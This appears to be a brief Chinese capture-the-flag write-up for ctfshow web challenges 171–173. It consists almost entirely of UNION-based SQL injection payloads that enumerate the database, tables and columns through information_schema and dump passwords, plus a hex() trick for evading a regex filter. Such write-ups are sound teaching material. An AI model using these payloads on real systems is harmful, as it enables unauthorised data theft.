web171
爆库:1'union select 1,2,database()--+
爆表:1'union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+
爆列名:1'union select 1,2,group_concat(column_name)from information_schema.columns where table_name='ctfshow_user'--+
查表:1'union select 1,2,group_concat(password)from ctfshow_user--+
web172
' union select 1,group_concat(password) from ctfshow_user2--+
web173
有正则过滤,这里使用hex进行绕过
' union select hex(id),hex(username),hex(password) from ctfshow_user3 where username='flag'--+
得到16进制转换一下
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
